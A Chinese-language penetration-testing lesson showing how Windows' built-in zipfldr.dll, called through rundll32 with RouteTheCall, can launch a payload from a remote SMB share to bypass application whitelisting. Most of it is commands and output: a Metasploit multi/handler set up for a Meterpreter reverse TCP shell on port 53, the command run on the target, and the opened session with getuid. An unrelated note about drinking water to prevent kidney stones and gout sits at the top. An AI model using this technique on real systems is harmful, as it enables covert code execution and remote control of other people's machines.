注:请多喝点热水或者凉白开,可预防肾结石,通风等。
痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。

zipfldr.dll简介:

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。

说明:zipfldr.dll所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。

Windows 2003 默认位置:

  1. C:\Windows\System32\zipfldr.dll
  2. C:\Windows\SysWOW64\zipfldr.dll

Windows 7 默认位置:

  1. C:\Windows\System32\zipfldr.dll
  2. C:\Windows\SysWOW64\zipfldr.dll

攻击机:
192.168.1.4 Debian
靶机:
192.168.1.3 Windows 7
192.168.1.3 Windows 2003

配置攻击机msf:

  1. msf exploit(multi/handler) > show options
  2. Module options (exploit/multi/handler):
  3. Name Current Setting Required Description
  4. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
  5. Payload options (windows/meterpreter/reverse_tcp):
  6. Name Current Setting Required Description
  7. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
  8. EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
  9. LHOST 192.168.1.4 yes The listen address (an interface may be specified)
  10. LPORT 53 yes The listen port
  11. Exploit target:
  12. Id Name
  13. ‐‐ ‐‐‐‐
  14. 0 Wildcard Target
  15. msf exploit(multi/handler) > exploit
  16. [*] Started reverse TCP handler on 192.168.1.4:53

第九十课:基于白名单zipfldr.dll执行payload第十八季 - 图1

靶机执行:

  1. rundll32.exe zipfldr.dll,RouteTheCall \\192.168.1.119\share\rev_x86_53_exe.exe

第九十课:基于白名单zipfldr.dll执行payload第十八季 - 图2

  1. msf exploit(multi/handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.1.4:53
  3. [*] Sending stage (179779 bytes) to 192.168.1.3
  4. [*] Meterpreter session 7 opened (192.168.1.4:53 ‐> 192.168.1.3:5245) at
  5. 20190121 04:55:44 0500
  6. meterpreter > getuid
  7. Server username: JohnPC\John
  8. meterpreter > getpid
  9. Current pid: 6988

第九十课:基于白名单zipfldr.dll执行payload第十八季 - 图3

Micropoor